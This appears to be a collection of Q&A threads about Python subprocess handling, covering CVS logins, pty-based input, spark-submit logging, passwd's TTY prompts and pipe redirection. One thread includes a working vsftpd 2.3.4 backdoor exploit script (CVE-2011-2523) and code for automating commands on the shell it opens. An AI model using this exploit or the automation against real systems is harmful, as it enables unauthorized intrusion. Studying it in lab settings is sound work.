Spawn subprocess that expects console input without blocking? (Python)

I am trying to do a CVS login from Python by calling the cvs.exe process.
When calling cvs.exe by hand, it prints a message to the console and then waits for the user to input the password.
When calling it with subprocess.Popen, I've noticed that the call blocks. The code is
subprocess.Popen(cvscmd, shell=True, stdin=subprocess.PIPE,
                 stdout=subprocess.PIPE, stderr=subprocess.PIPE)
I assume that it blocks because it's waiting for input, but my expectation was that calling Popen would return immediately and then I could call subprocess.communicate() to input the actual password. How can I achieve this behaviour and avoid blocking on Popen?
OS: Windows XP
Python: 2.6
cvs.exe: 1.11

Remove the shell=True part. Your shell has nothing to do with it. Using shell=True is a common cause of trouble.
Use a list of parameters for cmd.
Example:
cmd = ['cvs',
       '-d:pserver:anonymous@bayonne.cvs.sourceforge.net:/cvsroot/bayonne',
       'login']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
This won't block on my system (my script continues executing).
However since cvs reads the password directly from the terminal (not from standard input or output) you can't just write the password to the subprocess' stdin.
What you could do is pass the password as part of the CVSROOT specification instead, like this:
:pserver:<user>[:<passwd>]@<server>:/<path>
I.e. a function to login to a sourceforge project:
import subprocess

def login_to_sourceforge_cvs(project, username='anonymous', password=''):
    host = '%s.cvs.sourceforge.net' % project
    path = '/cvsroot/%s' % project
    cmd = ['cvs',
           '-d:pserver:%s:%s@%s:%s' % (username, password, host, path),
           'login']
    p = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT)
    return p
This works for me. Calling
login_to_sourceforge_cvs('bayonne')
will log in anonymously to the bayonne project's CVS.

If you are automating external programs that need input - like password - your best bet would probably be to use pexpect.
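pexpect works by running the child on a pseudo-terminal, so prompts that bypass stdin/stdout still reach your script. For the curious, here is a minimal stdlib-only sketch of the same idea (POSIX only; the getpass child below is a stand-in for cvs, which would be driven the same way):

```python
import os
import pty
import sys

# Sketch of the pty technique pexpect is built on (POSIX only).
# The child command is a stand-in: a script that reads a password
# from its controlling terminal, the way cvs or passwd do.
def run_with_tty_input(argv, reply):
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: the pty slave is now our controlling terminal.
        os.execvp(argv[0], argv)
    os.write(master_fd, reply)  # "type" the password into the terminal
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:  # Linux raises EIO at EOF on a pty master
            break
        if not data:
            break
        chunks.append(data)
    os.waitpid(pid, 0)
    return b"".join(chunks)

out = run_with_tty_input(
    [sys.executable, "-c",
     "import getpass; print('got ' + getpass.getpass('password: '))"],
    b"secret\n",
)
```

pexpect wraps exactly this (plus pattern matching on the output), which is why it can answer prompts that a plain subprocess.PIPE never sees.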

Related

How to interact with a reverse shell given by a script in python?

I would like to "automate" a reverse shell given by a script. Let me explain:
Context: there is a backdoor on a vulnerable machine.
What I am doing: I create a subprocess which executes a script (Python, Perl, ...) and which gives me a reverse shell.
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
What I would like to do: while my script runs (i.e. while the reverse shell is open), I would like to be able to interact with it through methods.
Today, I am able to type manually in the terminal of my reverse shell: the script that I call with Popen runs and uses the backdoor. This gives me a reverse shell and I can type my commands.
Tomorrow, I would like to be able to call methods during the execution of this reverse shell: I run a script with Popen, it exploits the backdoor and gives me a shell. Then, rather than typing commands manually, a whole series of commands should be sent to this reverse shell automatically, and for each of them I should be able to recover the returned data.
Ideally, I would like something like that:
backdoor.execute()      # opens the reverse shell
backdoor.send("whoami") # sends a command to the reverse shell and returns the result
...
backdoor.finish()       # closes the reverse shell
What I tried to do without success: I tried, with the Popen class of the subprocess module, to redirect the input and/or the output of the script:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
However, when trying to redirect these two streams (or just one of them), my reverse shell closes as quickly as it opened.
I also tried to put my commands directly on the communicate() method:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
I tried this with and without redirection of input and / or output, but nothing worked.
Finally, I tried to use the pexpect module to run my script to get a reverse shell, but I didn't get anything conclusive (maybe I did it wrong).
PS: I cannot change the code of the script that allows me to use the backdoor.
backdoor.py
#!/usr/bin/python3
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print(' [+]Exiting...')
    exit(0)

signal(SIGINT, handler)

parser = argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21  # if necessary edit this line

user = "USER nergal:)"
password = "PASS pass"

tn = Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)")  # if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.")  # if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2 = Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
This should work for the single command after a \n is appended and if the -u (unbuffered) option is used. Of course something has to be done with the return value in order to get the command output:
output = Popen(["python", "-u", "/opt/exploits/backdoor.py", remote_ip],
               stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami\n")
backdoor.send("whoami") # sends a command to the reverse shell and returns the result
Provided that
backdoor = Popen(["python", "-u", "backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE)
we can send a command (if you don't want to exit thereafter) with e.g.
backdoor.stdin.write(b"whoami\n")
and get the result of indeterminate length with
import select
import os

timeout = 1
while select.select([backdoor.stdout], [], [], timeout)[0]:
    print(os.read(backdoor.stdout.fileno(), 4096).decode())
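Putting those pieces together gives roughly the backdoor.execute()/send()/finish() interface from the question. This is a sketch (POSIX only, because it uses select on pipes): the ShellSession name is made up, and a trivial line-echoing child stands in for ["python", "-u", "/opt/exploits/backdoor.py", remote_ip]:

```python
import os
import select
import subprocess
import sys

class ShellSession:
    """Hypothetical wrapper giving the execute()/send()/finish() shape."""

    def __init__(self, argv):  # "execute": start the child
        self.proc = subprocess.Popen(argv, stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT)

    def send(self, command, timeout=1.0):
        # Write one command, then read until output pauses for `timeout` s.
        self.proc.stdin.write(command.encode() + b"\n")
        self.proc.stdin.flush()
        out = []
        while select.select([self.proc.stdout], [], [], timeout)[0]:
            data = os.read(self.proc.stdout.fileno(), 4096)
            if not data:
                break
            out.append(data)
        return b"".join(out).decode()

    def finish(self):
        # Closing stdin lets the child see EOF and exit.
        self.proc.stdin.close()
        return self.proc.wait()

# Demo with a stand-in child that echoes each command back:
session = ShellSession([sys.executable, "-u", "-c",
    "import sys\nfor line in sys.stdin: print('got ' + line.strip())"])
result = session.send("whoami")
rc = session.finish()
```

The timeout-based read is a heuristic: it treats a pause in output as "command finished", which is usually good enough for driving an interactive shell without a protocol.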

python subprocess module hangs for spark-submit command when writing STDOUT

I have a Python script that is used to submit Spark jobs using the spark-submit tool. I want to execute the command and write the output both to STDOUT and a logfile in real time. I'm using Python 2.7 on an Ubuntu server.
This is what I have so far in my SubmitJob.py script
#!/usr/bin/python
import subprocess

# Submit the command
def submitJob(cmd, log_file):
    with open(log_file, 'w') as fh:
        process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        while True:
            output = process.stdout.readline()
            if output == '' and process.poll() is not None:
                break
            if output:
                print output.strip()
                fh.write(output)
    rc = process.poll()
    return rc

if __name__ == "__main__":
    cmdList = ["dse", "spark-submit", "--spark-master", "spark://127.0.0.1:7077", "--class", "com.spark.myapp", "./myapp.jar"]
    log_file = "/tmp/out.log"
    exit_status = submitJob(cmdList, log_file)
    print "job finished with status ", exit_status
The strange thing is, when I execute the same command directly in the shell it works fine and produces output on screen as the program proceeds.
So it looks like something is wrong in the way I'm using subprocess.PIPE for stdout and writing the file.
What's the current recommended way to use the subprocess module for writing to stdout and a log file in real time, line by line? I see a bunch of options on the internet but am not sure which is correct or latest.
thanks
Figured out what the problem was.
I was trying to redirect both stdout and stderr to a pipe to display on screen. This seems to block stdout when stderr is present. If I remove the stderr=subprocess.STDOUT argument from Popen, it works fine. So for spark-submit it looks like you don't need to redirect stderr explicitly, as it already does this implicitly.
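For reference, a sketch of the working shape just described (Python 3 syntax): pipe only stdout and let stderr flow to the terminal untouched. A trivial python child stands in for the real ["dse", "spark-submit", ...] command line so the example is self-contained:

```python
import os
import subprocess
import sys
import tempfile

def submit_job(cmd, log_file):
    # Pipe stdout only; stderr stays attached to the terminal.
    with open(log_file, "w") as fh:
        process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                   universal_newlines=True)
        for line in iter(process.stdout.readline, ""):
            print(line, end="")  # echo to the screen in real time
            fh.write(line)
        return process.wait()

# Stand-in for the spark-submit command:
log_path = os.path.join(tempfile.gettempdir(), "submit_demo.log")
rc = submit_job([sys.executable, "-c", "print('line 1'); print('line 2')"],
                log_path)
```

Because only one stream is piped, the reader loop can never deadlock waiting on a second full pipe buffer.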
To print the Spark log
One can use the cmdList given by user330612:
cmdList = ["spark-submit", "--spark-master", "spark://127.0.0.1:7077", "--class", "com.spark.myapp", "./myapp.jar"]
Then it can be printed using subprocess; remember to use communicate() to prevent deadlocks: https://docs.python.org/2/library/subprocess.html
Warning: Deadlock when using stdout=PIPE and/or stderr=PIPE and the child process generates enough output to a pipe such that it blocks waiting for the OS pipe buffer to accept more data. Use communicate() to avoid that. Here below is the code to print the log.
import subprocess

p = subprocess.Popen(cmdList, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stderr = stderr.splitlines()
stdout = stdout.splitlines()
for line in stderr:
    print line  # now it can be printed line by line, e.g. to a file, for the log
for line in stdout:
    print line  # for the output
More information about subprocess and printing lines can be found at:
https://pymotw.com/2/subprocess/

How to prevent Python's subprocess from printing the standard out when calling the Linux passwd utility?

When I use subprocess I can normally capture the stdout and display it however I like. E.g,
import subprocess
proc = subprocess.Popen(['./foo.py'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# the standard out is not displayed unless I do something with the stdout var
stdout, stderr = proc.communicate()
However, if I use subprocess to call the Linux passwd utility, the standard out is displayed as soon as proc.communicate() is called:
import subprocess
proc = subprocess.Popen(['passwd', 'foo'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# standard out is displayed immediately
stdout, stderr = proc.communicate('password\npassword\n')
BAD PASSWORD: it is based on a dictionary word
Retype new password:
How come this happens only with passwd? For example, it doesn't happen with ls. Is there anything I can do to prevent the standard out from being printed when calling passwd from subprocess?
Note that I want to actually capture the standard out and do something with it later, so I would not want to set stdout to a devnull pipe.
It only happens with passwd because passwd directly communicates with the TTY, not via stdin or stdout. This is a security measure, and accepted best practice for prompting for a password directly from a user.
If you really must bypass this security measure, consider using the unbuffer utility (shipped with expect) to create a fake TTY:
p = subprocess.Popen(['unbuffer', 'passwd', 'foo'],
                     stdin=subprocess.PIPE,
                     stdout=subprocess.PIPE,
                     stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate('password\npassword\n')

How to redirect print and stdout to a pipe and read it from parent process?

If possible I would like not to use subprocess.Popen. The reason I want to capture the stdout of the process started by the child is that I need to save the output of the child in a variable to display it back later. However I have yet to find a way to do so anywhere. I also need to activate multiple programs without necessarily closing the one that's active, and I need to control the child process with the parent process.
I'm launching a subprocess like this
listProgram = ["./perroquet.py"]
listOutput = ["", "", ""]
tubePerroquet = os.pipe()
pipeMain = os.pipe()
pipeAge = os.pipe()
pipeSavoir = os.pipe()
pid = os.fork()
process = 1
if pid == 0:
    os.close(tubePerroquet[1])
    os.dup2(tubePerroquet[0], 0)
    sys.stdout = os.fdopen(pipeMain[1], 'w')
    os.execvp("./perroquet.py", listProgram)
Now as you can see I'm launching the program with os.execvp and using os.dup2() to redirect the stdout of the child. However I'm not sure of what I've done in the code and want to know of the correct way to redirect stdout with os.dup2 and then be able to read it in the parent process.
Thank you for your help.
I cannot understand why you do not want to use the excellent subprocess module, which could save you a lot of boilerplate code (and as many error possibilities ...). Anyway, I assume perroquet.py is a Python script, not an executable program. The shell knows how to find the correct interpreter for scripts, but the exec family are low-level functions that expect a real executable program.
You should at least have something like :
listProgram = [ "python", "./perroquet.py","",""]
...
os.execvp("python", listProgram)
But I'd rather use :
prog = subprocess.Popen(("python", "./perroquet.py", "", ""), stdout = PIPE)
or even as you are already in python import it and directly call the functions from there.
EDIT :
It looks like what you really want is:
user gives you a command (can be almost anything)
[ you validate that the command is safe ] - unsure if you intend to do it but you should ...
you make the shell execute the command and get its output - you may want to read stderr too and control exit code
You should try something like
while True:
    cmd = raw_input("commande :")  # use input() with Python 3
    if cmd.strip().lower() == 'exit':
        break
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, shell=True)
    out, err = proc.communicate()
    code = proc.returncode
    print("OUT", out, "ERR", err, "CODE", code)
It is absolutely unsafe, since this code executes any command just as the underlying shell would (including rm -rf *, rd /s/q ., ...), but it gives you the output, the error output and the return code of the command, and it can be used in a loop. The only limitation is that since you use a different shell for each command, you cannot use commands that change the shell environment - they will be executed but will have no effect.
Here's a solution if you need to extract any changes to the environment
from subprocess import Popen, PIPE
import os

def execute_and_get_env(cmd, initial_env=None):
    if initial_env is None:
        initial_env = os.environ
    r_fd, w_fd = os.pipe()
    write_env = "; env >&{}".format(w_fd)
    p = Popen(cmd + write_env, shell=True, env=initial_env,
              pass_fds=[w_fd], stdout=PIPE, stderr=PIPE)
    output, error = p.communicate()
    # this will cause problems if the environment gets very large as
    # writing to the pipe will hang because it gets full and we only
    # read from the pipe when the process is over
    os.close(w_fd)
    with open(r_fd) as f:
        env = dict(line[:-1].split("=", 1) for line in f)
    return output, error, env

export_cmd = "export my_var='hello world'"
echo_cmd = "echo $my_var"

out, err, env = execute_and_get_env(export_cmd)
out, err, env = execute_and_get_env(echo_cmd, env)
print(out)

How to control a command window opened from a .cmd file using Python

There's a file named startup.cmd that sets some environment variables, runs some preparation commands, then does:
start "startup" cmd /k
Which opens a command shell named startup. The manual process I'm trying to automate is to then enter the following command into this shell: get startup.xml. I thought the correct way to do this in Python would be something like this:
import subprocess
p = subprocess.Popen('startup.cmd', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
getcommand = 'get startup.xml'
servercommand = 'startserver'
p.stdin.write(getcommand)
p.stdin.write(servercommand)
(stdoutdata, stderrdata) = p.communicate()
print stdoutdata
print stderrdata
But those commands don't seem to be executing in the shell. What am I missing? Also, the command shell appears regardless of whether shell is set to True or False.
I found this warning in the subprocess documentation:
Warning Use communicate() rather than .stdin.write, .stdout.read or .stderr.read to avoid deadlocks due to any of the other OS pipe buffers filling up and blocking the child process.
So my suggestion is to use communicate to send your command.
import subprocess
p = subprocess.Popen('startup.cmd', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
command = 'get startup.xml\n'
command += 'startserver\n'
(stdoutdata, stderrdata) = p.communicate(command)
print stdoutdata
print stderrdata
Note also that start "startup" cmd /k launches a separate console process; you cannot drive that new window through the original Popen's pipes.
